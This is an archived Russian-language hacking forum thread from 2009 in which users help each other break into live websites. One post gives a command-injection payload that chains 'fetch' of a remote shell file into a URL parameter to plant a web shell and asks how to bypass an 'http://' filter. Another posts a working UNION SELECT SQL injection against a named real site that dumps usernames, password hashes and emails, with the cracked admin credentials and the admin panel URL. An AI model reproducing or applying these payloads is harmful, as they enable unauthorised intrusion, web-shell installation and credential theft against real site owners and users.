ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.02.2009, 11:17
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
Сообщение от sabe
есть запрос для залития шелла)
при этом фильтрует "http://"
тоесть https:// уже не фильтрует... но так не заливается.. наверника изза того что некому принять сертификат))
подскажите как обойти такой фильтр?
а ftp:// фильтрует?
|
|
|
20.02.2009, 11:35
|
|
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме:
57669
Репутация:
10
|
|
всем привет )
подскажите когда я проверяю скрип на -> ' но там все нормально , но когда я подставляю большое число пишет что запись с таким номером отсутствует ошибки скуля нет вот примет id=234 нормально а подставиш id=2349999 пишет что не существует. Говорит ли это что есть уязвимость?
Я вчера впервые провел пхп иньекцию прикольно))))
|
|
|
|
20.02.2009, 11:51
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Читаем:
http://forum.antichat.ru/thread104591.html
|
|
|
|
20.02.2009, 11:52
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
нет, это говорит о том, о чем оно говорит) что такой записи нету.
Я вчера впервые провел пхп иньекцию прикольно))))
поздравляю |
|
|
|
20.02.2009, 18:29
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от joomler
всем привет )
подскажите когда я проверяю скрип на -> ' но там все нормально , но когда я подставляю большое число пишет что запись с таким номером отсутствует ошибки скуля нет вот примет id=234 нормально а подставиш id=2349999 пишет что не существует. Говорит ли это что есть уязвимость?
Я вчера впервые провел пхп иньекцию прикольно))))
Угу, отсутствие страницы явно уязвимость. Из категории рутовых яваскриптов по протоколу TCP/IP, можно использовать только по вечерам четверга с 19:00 до 23:30 по местному времени.
Последний раз редактировалось .Slip; 20.02.2009 в 18:34..
|
|
|
|
20.02.2009, 19:45
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
laedafess
фтп не фильттрует))
-m0rgan-
какой хекс в смд? или я не понимаю
.php?dirname=+%26cd+_notes;fetch+http://site.com/shell.txt+-O+v.php%26
при этом фильтрует "http://"
а https:// не фильтрует.. но так не заливается.. наверника изза того что некому принять сертификат)) ftp:// тоже не фильтрует, фпт бес пароля fetch сможет пробить файл?)
подскажите как обойти такой фильтр?
Последний раз редактировалось sabe; 20.02.2009 в 20:26..
|
|
|
|
20.02.2009, 21:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
без протокола религия не позволяет?=) как вариант echo uploader > file
|
|
|
|
20.02.2009, 23:03
|
|
Новичок
Регистрация: 10.03.2008
Сообщений: 27
Провел на форуме:
71866
Репутация:
1
|
|
http://www.costa-real.ru/articlesInfo.php?id=-1+union+select+concat_ws(0x3a,user,password,email) ,2,3,4,5,6+from+ae_users--
Пароль админа в исходном тексте:
admin:21232f297a57a5a743894a0e4a801fc3
т.е admin:admin
админку долго не искал:
http://www.costa-real.ru/admin/index.php
Не пойму, почему залогиниться не могу?
|
|
|
|
20.02.2009, 23:32
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539
Репутация:
53
|
|
А что делать если при пхп иньекции фильтруются все символы просто убераются((
?act=(d,z.s:skfds) - выведет dzsskfds / а если ввести ?act=(d,z.s:s#kfds) - то только dzss обьясните такую странность)
|
|
|
|
20.02.2009, 23:50
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Сообщение от pingvit
Пароль админа в исходном тексте:
admin:21232f297a57a5a743894a0e4a801fc3
т.е admin:admin
админку долго не искал:
Не пойму, почему залогиниться не могу?
Поищи другие таблицы, ибо не исключено,что этот логин/пасс не от админки...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для S[N]EP](/avatars/avatar64392.jpg?1128151){kind=avatar}
Похожие темы
Линейный вид
